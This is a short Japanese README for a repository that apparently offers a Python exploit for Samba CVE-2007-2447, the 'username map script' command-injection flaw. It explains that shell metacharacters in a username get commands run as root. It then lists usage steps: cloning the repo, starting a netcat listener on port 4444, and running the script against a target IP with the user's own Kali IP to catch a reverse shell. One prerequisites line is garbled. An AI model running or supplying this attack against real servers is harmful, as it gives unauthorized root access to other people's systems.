
Samba CVE-2007-2447 エクスプロイト
このリポジトリには、Sambaサーバ(バージョン3.0.20~3.0.25rc3)における脆弱性 CVE-2007-2447 の悪用を自動化するPythonスクリプトが含まれています。このツールは、教育目的および許可された侵入テストのためにのみ開発されています。
「ユーザ名マップスクリプト」 の脆弱性は、Samba設定で username map script オプションが有効になっている場合に、ユーザ名入力のサニタイズが欠如しているために発生します。シェルのメタ文字(バッククォート ` やサブシェル $() など)を含むユーザ名を送信すると、サーバはそのコマンドをサービス権限(多くの場合 root)で実行します。
smbclient がインストールされた任意のLinux)smbclient(システムのPATHに存在する必要があります)git clone [https://github.com/Daviddoctor/Samba-CVE-2007-2447-Exploit-Username-Map-Script-.git]
cd samba-exploit-cve-2007-2447
chmod +x exploit.py
nc -lvnp 4444
./exploit.py <ターゲットIP> <自身のKali IP> -p 4444